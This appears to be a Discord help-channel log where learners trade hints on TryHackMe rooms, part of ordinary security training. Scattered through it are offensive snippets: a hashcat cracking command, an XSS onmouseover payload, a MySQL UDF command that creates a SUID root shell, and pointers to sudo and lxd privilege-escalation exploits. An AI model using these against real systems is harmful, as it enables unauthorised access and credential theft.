eyyy thats cool

normal ermine
#

+rep @worn otter

green minnowBOT
#

Gave +1 Rep to @worn otter

peak cypress
#

Hey everyone, I have a question that if i am running a nmap scan in my VM that it says that <Host seems down. If it is really up, but blocking our ping probes, try -Pn>

#

if i run it in tryhackme attack box it ru successfully

#

so what to do because i am not a subscribed so i run attackbox only 1 hour per day

#

so can i do this through openvpn

#

if not then what to do?

ashen moon
ashen moon
strange crest
#

Been working on the Daily Bugle room for too long. I must be missing something obvious.
I've looked over several walkthroughs and can't seem to get sqlmap or the joomblah.py python script to dump the password hashes. Also, pet peeve - Task 1's answer is a different syntax to the answer in the web server.

This is what I get when I run joomblah.py

stuck fractal
white salmon
#

I have John working on the password file for over an hour... Am I missing something ?

stuck fractal
#

Room, task, question?

nocturne arch
#

Agent-sudo
Any hints how to get the information from the photo? google dork and exiftool gave me nothing Ushanka_Sad

unborn canopy
nocturne arch
#

the first ones from ftp, "fake aliens"

unborn canopy
#

||binwalk|| use the ||-e flag to extract||

nocturne arch
#

thx vent

#

+rep @unborn canopy

green minnowBOT
#

Gave +1 Rep to @unborn canopy

crystal zealot
#

Hey i am stuck somewhere can u help

#

Oh shit i can't send pic

#

class NetCat:
1 def init(self, args, buffer=None) :
self.args = args
self.buffer = buffer
2 self.socket = socket.socket (socket. AF_INET,
socket.SOCK_STREAM)
self.socket.setsockopt(socket. SOL_SOCKET,
socket.so_REUSEADDR, 1)
def run(self):
if self. args.listen:
3 self.listen()
else:
4 self.send()

#

Why we use args in this

#

What is the use of args

#

Your one help is equal to 1 bitcoin

little shoal
#

args is used to determine if we want NetCat to listen (client) or send (remote)

wise ore
#

any hints for room glitch im stuck on user.txt

stuck fractal
rugged fiber
rugged fiber
stuck fractal
# rugged fiber xposting?

Yeah. Ask in the appropriate channel and wait for a response. Don't ask the same thing over several channels.

rugged fiber
stuck fractal
#

Ok, but please listen to me. Don't do that. It's spammy.

rugged fiber
stuck fractal
#

That includes sanity checks and nudges in the correct direction

rugged fiber
stuck fractal
#

Yes. The issue is the fact you asked it across multiple channels.

rugged fiber
stuck fractal
#

Yes. And I am telling you not to do that, and you're arguing.

#

Just listen to what I'm saying because next time it will be more than just "please don't do this".

rugged fiber
stuck fractal
#

I didn't ask for your side.

#

I just asked you not to do it.

#

You can simply apologise and not do it again. That's all that needs to happen.

sweet ferry
#

I am doing the inferno room and i got a rce exploit for it and u get my reverse shell back but it immediately exits itself with exit command, meaning its configured such way

#

Any hints to move further?

#

Top right terminal is where i get the shell and it automatically exits

stuck fractal
#

@full panther That room is not public.

icy narwhal
stuck fractal
dry current
#

right now i am solving Task 26 [Severity 8] Insecure Deserialization - Code Execution

#

I know python very well

#

But here why use command = "abcdxyz..........."

light horizon
#

Hello

#

Is python some kind of a hacking website?

stuck fractal
#

No.

light horizon
#

Are there any hacking courses or some kind of a tutorial for beginners

light horizon
#

Dope

stuck fractal
#

That's one resource yeah

light horizon
#

So we can learn from this or is the premium one better

tight fulcrum
#

It's a good start.You might wanna subscribe to get more content

stuck fractal
#

If you get on with it, you can pay and get more content

light horizon
#

OK, thx guys. Gonna go start tutorials now

tight fulcrum
#

Happy hacking

lucid olive
#

Hi, I'm doing https://tryhackme.com/room/commonlinuxprivesc and at task 4 answering the second last question. I'm tried/etc/passwd and /etc/shadow. The box says Uh oh! undefined so not sure if the answers are incorrect. Is one of these correct or is there some other place I should be looking?

stuck fractal
#

BitDefender?

lucid olive
#

Yep

#

That worked, thanks.

sick pasture
#

Hi, I'm doing https://tryhackme.com/room/linuxprivesc# and at task 15. I got the root bash. When I run whoami, it shows root but my uid and gid is still showing 1000 (user) and using sudo -l, it is still saying that I can only run the same commands as User user without password. So does this mean it is not a true root bash?

sick pasture
#

And also may I ask how do I post screenshots along with my questions?

proud scarabBOT
slender dawn
#

like this :

#

which is given in the other tasks

sick pasture
green minnowBOT
#

Gave +1 Rep to @slender dawn

slender dawn
#

yeah this was just one of the methods you can do

#

also you should verify so that you can send screenshots

sick pasture
# slender dawn !docs verify

I'm so sorry. Still a little unsure about this. So basically I just put the "!docs verify" and then ctrl v whatever screenshot I have?

tight fulcrum
#

You have to follow the steps in the link

sick pasture
#

Ohhh, okay.

sick pasture
sick pasture
slender dawn
#

np

drowsy laurel
#

Good evening everyone. I am unfortunately failing the last question from the quiz of https://tryhackme.com/room/bpsplunk. What is the website where you can find the Splunk forums at? I have not found any forums, but only the community pages, but none of the links here is the correct solution. Please send h3lp ..

glacial gust
stable lake
#

Hello I'm doing OWASP Juice Shop room and I can not answer or understand what the question is for Task5 Question 3 - Download the backup file. I have downloaded the file from the FTP server and I have got the MD5 hash of the file and that's not right for the answer I have also looked in the file and I can not see a flag in there as well. I guess my issue is more whats the question ?

stuck fractal
stable lake
#

please for get this question the web site has now given me the guild, after deleting my cookies

robust gorge
#

Does anybody know if there is a PS command to find the number of logs for an event. Right now I'm trying: PS C:\Users\THM-Analyst> Get-WinEvent -Path C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx. But it just prints out all events which i don't want; all i want is the "count or number of events" is there another command i can add to filter just this? or am i going about this completely the wrong way?

pure thistle
robust gorge
green minnowBOT
#

Gave +1 Rep to @pure thistle

white salmon
#

not familiar with kerbrute.. not sure if im correct on command line

remote gate
cold oracle
#

and try --dc instead of -dc-ip

light crystal
#

Halo

#

I'm new

real geode
#

Hello Guys
I'm stuck in the room zthweb2
Section3 API Bypassing Challenge. I've used big.txt without any results 😢
somebody can help me plz ?

sick pasture
real geode
sick pasture
sick pasture
real geode
sick pasture
green minnowBOT
#

Gave +1 Rep to @real geode

real geode
sick pasture
# real geode the second parameter is the port, you need to put the correct port (like 81 if y...

Are you referring to the local_port parameter in my previous screenshot? That is actually to tell nc.exe (the netcat binary for that task) which port to connect to so that we can get the reverse shell. I believe this is the part where the script is trying to get the nc.exe file from my machine. Do you know how I can state the port here? I tried adding ":portnumber" behind the +ip_addr+ but it said there was a syntax error.

stuck fractal
#

Add it in the quotes after

#

Not just to the end

sick pasture
stuck fractal
#

ip_addr+":port%2F....."

sick pasture
green minnowBOT
#

Gave +1 Rep to @stuck fractal

real turret
#

Morning - Quick Question please - When saving a private id_rsa key what file format do i save it as?

stuck fractal
#

You don't?

real turret
#

I would have thought .pem but the shh server is returning invalid file format

stuck fractal
#

File extensions are meaningless outside of windows pretty much

#

Is this for a tryhackme room?

real turret
#

its the LFI room

stuck fractal
#

Ok. You don't save it with any extension.

real turret
#

hmmm

#

im still getting a invalid file format for my key

stuck fractal
#

Make sure there aren't any spaces in weird places. Make sure there is a single blank like at the end.

#

Invalid file format or invalid format?

#

!docs verify

proud scarabBOT
stuck fractal
#

Follow those steps amd then you can post images

real turret
#

its says - key invalid format

stuck fractal
#

screenshot please

#

But please check the things I suggested

real turret
#

checking now - thanks

#

sorry that isnt clear at all

silver otter
#

I can't wait till they invent printscreen

real turret
#

i couldnt find the shortcut

silver otter
#

is there a leading space?

real turret
silver otter
#

also no single blank line at the end like James mentioned

real turret
#

ok ill try that thanks

silver otter
#

mine on my current host looks like this

#

not the same but

#

same format

real turret
#

all spaces look ok

stuck fractal
#

There's a space at the start where there shouldn't be, in that image

#

and we also can't tell if there are trailing spaces etc

real turret
#

thanks gents, issue solved. there was a space at the end

white salmon
green minnowBOT
#

Gave +1 Rep to @remote gate

fallow brook
#

i m doing room cooctus stories

#

when i compare both the commits inside of plain text i get this

wise ore
#

im stuck on year of the rabbit i got eli's ssh password but don't know to switch to gwendoline any hints.

wise ore
#

np i got what i was looking for

wise ore
#

how would you guys expolit this shit

stuck fractal
#

Do it in two steps rather than one

red arch
#

if you are really really stuck you can look at ||CVE-2019-14287||

wise ore
#

hints would be good

tired veldt
#

Hi- could not get a rev shell either- did you find a solution? Sp far, I can only get a shell when using THM Attack box- suspect a python script issue

pure thistle
stuck fractal
#

Eh there's another step to it that's important

wise ore
# pure thistle you need to run the full command
BleepingComputer

A vulnerability has been discovered in the Linux sudo command that could allow unprivileged users to execute commands as root. Thankfully, this vulnerability only works in non-standard configurations and most Linux servers are unaffected.

green minnowBOT
#

Gave +1 Rep to @pure thistle

wise ore
#

right now im stuck on another box lol

split breach
#

how do i crack this ??

#

Hash: $6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.

Salt: aReallyHardSalt

split breach
#

hashcat -m 1800 hash2.3 /usr/share/wordlists/rockyou.txt

#

cat hash2.3
$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02:aReallyHardSalt

split breach
stuck fractal
#

Please don't ask the same question over multiple channels @split breach

white salmon
split breach
#

@white salmon ninja is helping me out in #room-help you can come over there

slim pewter
#

What does the test"do in: test" onmouseover="alert('Hover over the image and inspect the image element')"

slim pewter
#

"test"

cedar axle
#

nothing

#

nothing exciting

slim pewter
#

interesting

cedar axle
#

you can probably exchange that for anything

slim pewter
#

Yeah, I saw that

#

I even removed it

#

still works

#

so is "onmouseover" a specific command?

cedar axle
#

yes, it activates when your mouse pointer goes over the element

stuck fractal
#

It belongs to the element

cedar axle
slim pewter
#

oh, so that's the vulnerable attribute in the js code?

cedar axle
#

not necessarily, just a way to activate it

slim pewter
#

interesting

#

there's so much to learn

#

I need to understand why certain things are happening

sick sierra
#

Hey eveyone! I'm trying to gain root access to the GamingServer box with no success. I don't know the user's password because I got access using their id_rsa key. I've searched for suid files and ran linpeas.sh locally and nothing really caught my eye that would help me escalate my privileges. I'm thinking I overlooked something, or that there's a 'deployment system' somewhere to be picked at, but I don't know what that is. Any hints as to where to look to progress further?

worn otter
#

I haven't done that room, but other things to potentially look for are services running on the machine, local ports being used. If linpeas didn't give you anything useful, then that rules out a lot of the easy things. Is there perhaps some other service or port running on the machine that you can do something with?

sick sierra
#

in terms of services running on open ports, no. only the webserver and ssh. The apache config files didn't have anything useful for us I believe. the user has stuff in their /home/.config files (a subfolder named lxc), but I can't tell if it's important or not

worn otter
#

link the room?

sick sierra
worn otter
#

ah. Yeah, that doesn't give a lot of hints to work with

sick sierra
#

supposed to be a 'game server' box but idk what software or binaries would be related to that.

#

oh well, thanks anyways. I'll look at it again tomorrow, gotta eat 🙂

#

it's strange because getting initial access was a breeze

worn otter
#

maybe try replacing one of the services the game server uses?

#

Do a strings on the binaries that are running, see if you can restart them?

pure thistle
sick sierra
#

I did check and lxd was peculiar (it's also highlighted by linpeas), and a quick look online reveals that it's related to linux containers and whatnot. Is this the lead?

pure thistle
#

yes google lxd exploit

sick sierra
#

Ok thanks I'll do that after a snack. Everyone stay hydrated!

#

haha How can we tell when/that "this is it" though, there are so many things to learn

pure thistle
#

lol once you do the lxd exploit the next box you do that has a user in the lxd group you will probably start with that exploit first i know i do

worn otter
#

as for how do you know when "this is it", I'd say: anything that gets you any kind of escalation or new information.

#

i.e.: when it works

sick sierra
#

Thank you both @worn otter and @pure thistle , I got the flag. It's a pretty nice trick indeed

green minnowBOT
#

Gave +1 Rep to @worn otter

pure thistle
sweet ferry
#

I am doing the relevant room

#

I got a shell as web user

#

Any hints for privesc

sick sierra
#

Nice nice

agile widget
#

Need a hint, I'm on Linux Fundamentals Q7, finding shiba4 password. The bin is supposed to check if I have directory test in my home directory, and file test1234 in directory test... Need a nudge in the right direction from what I have so far

stuck fractal
#

Yep, so you need to find the binary

#

You haven't quite done that yet

agile widget
#

Oh hmm

#

I come up with nothing when running find / shiba4 PepoThink I'm just stuck with the find command

stuck fractal
#

Yep, that syntax isn't quite right

#

At the moment you're saying list all files in / and all files in shiba4

agile widget
#

Got it, had to do find ../.. -name shiba4 -type f -print -quit

#

Thanks, James

cyan swift
#

Any hints for Room Ignite, root flag? I ran linpeas but couldnt find anything I could exploit
|| I thought it might be one of the SUID binaries like pkexec or pppd|| but couldnt exploit that as well

narrow wren
serene badger
#

hello, ive just been going through the linux basics rooms. Im stuck at task 14 of room 2. can anybody help?

stuck fractal
#

It's always best to directly ask your question

#

Someone can't know if they can help unless they know the problem

serene badger
#

its about chown

#

How would you change the owner of file to paradox

#

is the question

#

but i dont really get chown yet

uneven snow
#

it is no longer necessary to put "#!" at the beginning to make a bash script?
I ask this because I was able to run a script without initially adding "#! / bin / bash

stuck fractal
#

Is this for a specific tryhackme room?

#

It sounds like it's generic.

uneven snow
#

oh ook sorry

lusty tide
#

Hi there, I hope somebody has a tip for me on what to do here.

I am busy with network services (SMB) right now. I am supposed to find the contents of a file but I spent the last 30minutes struggling with it. Any ideas?

#

i have tried using open , get among other commands in the smb shell to try and get something

#

I get an error that reads NT_STATUS_OBJECT_NAME_NOT_FOUND

tight fulcrum
#

!docs verify

proud scarabBOT
lusty tide
#

Oof. Sorry I neglected to verify

#

I am going to try again a bit later then I will share screenshots. Thanks for reaching out though

cyan swift
green minnowBOT
#

Gave +1 Rep to @narrow wren

cyan swift
uneven snow
#

room nmap, task 8, second quest

#

I understand that this scan is more stealthy and circumvents some firewalls, but I can't identify the specific answer he wants, any tips?

stuck fractal
#

It's in the text

#

It's not for stealth

uneven snow
#

damn, very specific kkkkkk thank you

white salmon
#

hi guys
Can you please advise how may I follow up on this one?

#

I got the file and was able to get do the changemod but I have not clue how should I work out uid and pw

stuck fractal
#

Use the key to log in via SSH. Get the flag

#

You don't need the password because you're authenticating with the key

white salmon
#

am I still suppose to do this part from terminal? ( i have only used 'ssh uid@ip' so far )

#

will try to look up, thank you

stuck fractal
white salmon
#

has anyone been able to figure out how to find the answer to the security question in the OWASP Juice shop room "Your mother's maiden name?"

white salmon
#

What exact answer is required here?
I have almost checked every nmap option but Service is unknown

#

found nothing else which can be referred as 'title'

silver otter
#

did you use -A with nmap?

#

the non standard port mentioned in the previous question definitely has a title that will lead to that answer

white salmon
silver otter
#

ok yeah, the task asks to scan with -A and -p-

#

good luck!

white salmon
#

thank you

thick roost
#

Having issues in Task 2 of the LinuxPrivEsc room; while following along at the 5th code block "select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');" I get ERROR 1126 (HY000): Can't open shared library 'raptor_udf2.so' (errno: 22 /usr/lib/mysql/plugin/raptor_udf2.so: file too short).

storm venture
#

so the shebang specifies that it should be run in bash (to the best of my understanding)

#

you'll still be able to run the program like bash [program] regardless of the shebang, so it's not necessary

#

however, I think modern day terminals are pretty good at taking a good guess with which program they should run your script with

hallow shore
#

Hello im in the Who's flying this thing in the OWASP Juice shop, and i cant get the answer after i changed the Get /rest/basket/1 from 1 til 2 ? am i missing out on something? i have tried 3 users now
can anyone help me 🙂

white salmon
#

Hi Can someone please advise what am I doing wrong at Network services room (telnet second task)?

tight fulcrum
white salmon
#

🤦‍♂️

#

thank you

#

I must get used to getting a lot of error, and missing reports + errors and still getting an answer

slim pewter
#

whats the default path of the private ssh key?

#

~/.ssh/is_rsa ?

stuck fractal
#

~/.ssh/id_rsa

#

For RSA keys at least

#

There's other key types like dsa or EC crypto

slim pewter
#

I'm stuck on task 4 ZTH: Obscure web vulns

#

~/.ssh/id_rsa in the file place

#

to read private ssh

#

but its wrong

pure thistle
polar brook
#

Hey

stuck fractal
#

👋 Everything good Khaotic?

barren chasm
#

I'm working on the room Brainstorm my nmap scan with -p- shows X ports but question expects more, I've ran the scan multiple times to check and always get X ports. I've read some chat history and multiple people get this problem, any idea why?

stuck fractal
#

IIRC it's just Windows being weird and inconsistent

barren chasm
#

weird, ty @stuck fractal

green minnowBOT
#

Gave +1 Rep to @stuck fractal

woven nexus
#

noob question: I'm in the Nmap room and the question is having me perform an xmas scan on the first 99 ports on the machine, but nmap is telling me that the host is not up, the command i'm running is 'sudo nmap -sX -p 1-999 10.10.xxx.xxx' any idea what i'm doing wrong?

stuck fractal
#

You need an extra flag because it doesn't respond to pings

woven nexus
#

ahh ok

stuck fractal
#

Nmap suggests it for you.

woven nexus
#

yes I did find out it doesn't respond to pings so I must also need to use the -Pn flag

stuck fractal
#

Yep, so you just need to add that to the scan

woven nexus
#

perfect, seems to be scanning now, waiting results. And this is most likely because the machine has a firewall blocking ICMP packets?

stuck fractal
#

Yep. Windows firewall does for default with THM

woven nexus
#

noice, ok cool. and these flags don't have to be in any particular order, just as long as they all come before the input

stuck fractal
#

You can put them after the IP, I sometimes do.

#

Usually when I forget a flag, just adding it on to the end

woven nexus
#

ok thanks for all the help. Another question. The following question in the room asks me for the reasoning why Nmap stated all 999 ports were open/filtered and this was because of no responses. Given that it doesn't respond to pings, I know it's using a firewall to block ICMP packets, and given that there are no responses, this means that the firewall is dropping the packets rather than sending an RST?

stuck fractal
#

For that scan type, yeah

#

Firewall or just the standard behaviour for the OS.

green minnowBOT
#

Gave +1 Rep to @stuck fractal

woven nexus
#

I'm unfortunately stuck again. I ran the TCP SYN scan on the first 5000 ports of the machine using 'sudo nmap -Pn -sS -vv -p 1-5000 10.10.xxx.xxx' - my output says all ports are filtered because of no responses, so I put 0 in my answer when asked how many were shown to be open, and that is incorrect. Any guidance on what I should have done differently?

#

I think I got my answer running a -A but I don't think that's the point of the exercise

woven nexus
#

oh nvm i ran it again and it worked, think my vpn disconnecte

worn otter
woven nexus
green minnowBOT
#

Gave +1 Rep to @worn otter

woven nexus
stuck fractal
#

-sV

#

find out which port "SMB" is running on You're a single letter off there. Port(s)

worn otter
#

Ninja James is Ninja fast.

woven nexus
green minnowBOT
#

Gave +1 Rep to @stuck fractal

woven nexus
#

sorry... still not sure what I'm missing.

#

I see the open ports, just not sure which ones SMB is running on. this is what I see.

#

then it just continues to timeout

true knot
#

evning, playing with HoTH#1 and found the 3rd and 4th flag on easy challange. 2nd flag seems "easy" but i seem to be unable to submit it.
I've tested with back and front ticks but unable to add it. Am i looking at it wrong maybe ? :) (edit for wrong flag)

woven nexus
#

Op! Found it, the room told me to run -p- which took forever and the scan never finished. I ran -p to scan top 1000 ports and got what I needed. Thanks!

true knot
brave rock
#

has anyone done all machines in the Buffer Overflow OSCP prep? I wanted to know which of the machines or the overflows have a non-standard buffer overflow that doesn't use jmp esp so i can practice that

#

like using optcode commands or something?

cursive nexus
# brave rock like using optcode commands or something?

I've completed them all. They are all very much the same but with different register positions. I use the term "register positions" lightly as I am not entirely sure that's the correct terminology but essentially, you're going to find that it is standard buffer overflow from the first one to the last one.

white salmon
#

can u explain this question

#

How many ports are open with a port number under 1000?

tight fulcrum
#

Scan the ports 1-999 and count how many of them are open